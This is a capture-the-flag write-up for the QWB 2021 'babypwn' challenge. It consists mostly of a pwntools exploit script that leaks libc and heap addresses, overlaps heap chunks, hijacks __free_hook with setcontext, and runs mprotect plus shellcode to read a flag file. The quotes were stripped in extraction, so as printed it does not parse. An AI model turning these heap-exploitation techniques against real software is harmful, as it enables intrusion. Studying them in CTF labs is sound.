qwb2021 pwn复现

babypwn

exp

from pwn import *
from z3 import *
# Debug-level pwntools logging. The unquoted `debug` here (and the unquoted
# LD_PRELOAD key/paths below) show that single-quoted strings lost their
# quotes when this listing was extracted; as printed these lines do not parse.
context.log_level=debug

# Launch the challenge binary through a specific glibc 2.27 loader, with the
# matching libc and a bundled libseccomp.so.2 preloaded (paths are the
# author's local layout). Pinning this exact libc is what makes the fixed
# offsets used later in the script (e.g. base=addr-0x3ebe90) meaningful.
# NOTE(review): the preloaded libseccomp suggests the binary installs a
# syscall filter — confirm against the target.
p=process(["/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/ld-2.27.so","./babypwn"],env={LD_PRELOAD:/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so:./libseccomp.so.2})
#p=process(‘./babypwn‘)
def add(size):
  """Menu option 1: answer the `size:` prompt with `size`.

  Sends the menu choice, then the decimal size; the program's reply is
  not read here. (As printed, the prompt strings and the `1` are missing
  their quotes.)
  """
  p.sendlineafter(>>> \n,1)
  p.sendlineafter(size:\n,str(size))

def edit(index,content):
  """Menu option 3: select entry `index` and send `content` as its new data.

  `content` is sent as-is via sendlineafter (pwntools appends a newline);
  callers build it themselves with p64()/ljust(). (Prompt strings are
  missing their quotes in this listing.)
  """
  p.sendlineafter(>>> \n,3)
  p.sendlineafter(index:\n,str(index))
  p.sendlineafter(content:\n,content)

def free(index):
  """Menu option 2: release entry `index`.

  Also the final trigger of the script: after the hook overwrite below,
  the closing free(0) is what hands control to the installed value.
  (Prompt strings are missing their quotes in this listing.)
  """
  p.sendlineafter(>>> \n,2)
  p.sendlineafter(index:\n,str(index))

def show(index):
  """Menu option 4: ask the program to print entry `index`.

  The output is not consumed here; the caller reads it line by line with
  p.recvline() and feeds each hex line through solve() — the binary
  presumably scrambles the values it prints, confirm against the target.
  (Prompt strings are missing their quotes in this listing.)
  """
  p.sendlineafter(>>> \n,4)
  p.sendlineafter(index:\n,str(index))
  
def solve(target):
  """Invert two rounds of a 32-bit xorshift and return the preimage of `target`.

  Each loop iteration is algebraically one xorshift32 step
  (x ^= x<<5; x ^= x>>17; x ^= x<<13) written as a single expression:
  32*x is x<<5 in 32-bit BitVec arithmetic, and LShR is the logical right
  shift (z3's `>>` on a BitVec is arithmetic, which would be wrong here).
  The solved value is returned as a plain Python int.

  Raises AssertionError if z3 finds no 32-bit input that maps to `target`.
  (As printed, BitVec's name argument is missing its quotes.)
  """
  a1=BitVec(a1,32)
  x=a1
  for _ in range(2):
    # one scrambling round; see the docstring for the expanded form
    x^= (32*x)^LShR((x^(32*x)),17)^(((32*x)^x^LShR((x^(32*x)),17))<<13)
  s=Solver()
  s.add(x==target)
  assert s.check()==sat
  return (s.model()[a1].as_long())

#leak libc_base
# Layout: index 0 and indices 2..8 are 0x1f0-byte requests, index 1 (0x200)
# sits between them. Indices 2..8 are released first (seven frees of one size
# class), then index 0. NOTE(review): glibc 2.27's tcache keeps seven entries
# per size, so the eighth free of this size presumably lands elsewhere — that
# is what the later show(8) leak appears to depend on; confirm in a debugger.
add(0x1f0)
add(0x200)
for i in range(2,9):
  add(0x1f0)
#pause()
for i in range(2,9):
  free(i)
free(0)


# Re-take seven 0x1f0 chunks and fill every entry except index 5 with 0x18
# repeated (0, 0x21) qword pairs — presumably header-like rows, confirm.
# `print i` is Python 2 syntax; the whole script is Python 2.
for i in range(7):
  add(0x1f0)
  print i
  #pause()
  if i!=5:
    edit(i,(p64(0)+p64(0x21))*0x18)

 
# One more allocation, then dump index 8. The program prints two lines; each
# is parsed as hex (note the stripped quotes around `0x`), undone with
# solve(), and the two 32-bit halves are recombined into one 64-bit value.
add(0xa0)
show(8)
libc=ELF(/root/glibc-all-in-one-master/libs/2.27-3ubuntu1_amd64/libc-2.27.so)
tmp1=solve(int(0x+p.recvline(keepends=False),16))
tmp2=solve(int(0x+p.recvline(keepends=False),16))

# Low dword is printed first, high dword second.
addr=(tmp2<<32)+tmp1
print hex(addr)
# 0x3ebe90 is the offset of the leaked pointer within this exact libc build
# (2.27-3ubuntu1); it is not portable to other libc versions.
base=addr-0x3ebe90
libc.address=base

#leak heap_base
# Allocate one more chunk, release indices 8 and 9, then dump index 5 (the
# one entry left unfilled above). Same two-line hex decode as the libc leak.
add(0x140)
free(8)
free(9)
show(5)
tmp1=solve(int(0x+p.recvline(keepends=False),16))
tmp2=solve(int(0x+p.recvline(keepends=False),16))
addr=(tmp2<<32)+tmp1
print hex(addr)

# 0x12c0 is the author's measured distance from the leaked pointer to the
# heap start for this binary; re-measure if the allocation sequence changes.
heapbase=addr-0x12c0

# Attach a debugger here; the pause() calls below are manual breakpoints
# and can be dropped for an unattended run.
gdb.attach(p)

add(0xa0)#8
add(0x148)#9
# A fixed heap offset chosen by the author; every pointer written below
# points at it.
addr=heapbase+0xcb0
# (the quotes around the 'a' filler are missing in this listing)
edit(9,a*0x148)
pause()
# Index 9: addr twice, filler up to 0x140, then a size-like field of
# 0x150+0xa0 = 0x1f0.
py=p64(addr)*2
py=py.ljust(0x140,a)+p64(0x150+0xa0)
edit(9,py)
# Index 8: a (0, 0x1f0) pair followed by addr twice.
edit(8,p64(0)+p64(0x1f0)+p64(addr)*2)
# Index 1: 0x1f0 bytes of filler, then a (0, 0x251) pair at offset 0x1f0.
edit(1,a*0x1f0+p64(0)+p64(0x251))
pause()
add(0x1f0)
pause()
# Release 0 and 2..7, then 1 — the author's own marker says this last free
# is where two chunks come to overlap.
free(0)
for i in range(2,8):
  free(i)
pause()
free(1)#overlap

# Resolve the libc symbols for the final stage from the rebased ELF
# (symbol names are missing their quotes in this listing). `system` is
# resolved but never used in the rest of the script.
# NOTE(review): everything below depends on a writable __free_hook; current
# glibc releases no longer ship the malloc/free hooks, which is why the
# script pins libc 2.27 above.
free_hook=libc.sym[__free_hook]
system=libc.sym[system]
# +53 is an entry offset into setcontext specific to this libc build, used
# so the register state comes from the buffer rdi points at (the frame built
# below) — verify against the disassembly of this exact libc.
setcontext=libc.sym[setcontext]+53
mprotect=libc.sym[mprotect]
pause()
add(0x120)#0
add(0x140)#1
pause()
free(1)
free(9)
pause()
# Index 0 data: the string "./flag" (quotes stripped), 152 bytes of filler,
# then the address of __free_hook; the author labels this a fastbin attack.
edit(0,./flag\x00\x00+a*152+p64(free_hook))#fastbin_attack
pause()
# Two more 0x140 allocations; the second (index 2) is the one written
# through below, so it presumably now overlays __free_hook — confirm.
add(0x140)#1
add(0x140)#2

pause()
# amd64 is needed for both the SigreturnFrame() layout and asm() below
# (quotes stripped in this listing).
context.arch=amd64
# Register state to be loaded via setcontext: mprotect(page containing
# __free_hook, 0x1000, 7) with 7 = PROT_READ|PROT_WRITE|PROT_EXEC, and the
# stack pointer placed at free_hook+0x10 so that the return after mprotect
# presumably lands on script-controlled data. cs=0x33 / ss=0x2b are the usual
# x86-64 user-mode selectors.
sig=SigreturnFrame()
sig.rsp=free_hook+0x10
sig.rbp=sig.rsp
sig.rip=mprotect
sig.rdi=free_hook&0xfffffffffffff000
sig.rsi=0x1000
sig.rdx=7
sig.csgsfs=0x2b000000000033
# Chunk 0 now holds the frame; the closing free(0) passes it as the hook's
# argument.
edit(0,str(sig))
pause()
# Three raw syscalls: open(sh, O_RDONLY), read(3, bss1, 0x300),
# write(1, bss2, 0x100). No execve is used, consistent with a seccomp
# filter being present (presumed from the preloaded libseccomp — confirm).
# The triple quotes appear as curly ‘ characters in this listing and would
# not parse as printed.
shellcode=‘‘‘
mov rax,2
mov rdi,{sh}
mov rsi,0
syscall

xor rax,rax
mov rdi,3
mov rsi,{bss1}
mov rdx,0x300
syscall

mov rax,1
mov rdi,1
mov rsi,{bss2}
mov rdx,0x100
syscall
‘‘‘.format(sh=free_hook+0x78,bss1=free_hook-0x500,bss2=free_hook-0x500)
shellcode=asm(shellcode)
# Buffer written through index 2: first qword = setcontext+53 (the value
# free() will call), then "flag", a pointer to free_hook+0x18 (offset of the
# shellcode bytes if this buffer sits at __free_hook), then the shellcode;
# a NOP-padded (0x90) copy of the buffer is appended, then "flag" once more.
# (Single-quoted strings are missing their quotes; the double-quoted one
# survived.)
py=p64(setcontext)+flag\x00\x00\x00\x00+p64(free_hook+0x18)+shellcode
py+=py.ljust(0x100,\x90)
py+="flag\x00\x00\x00\x00"
edit(2,py)
pause()
# Trigger: free(0) invokes the overwritten __free_hook with chunk 0 (the
# frame) as its argument; setcontext then installs that register state,
# mprotect runs, and execution continues into the shellcode. Finally hand
# the terminal to the user.
free(0)
p.interactive()

 
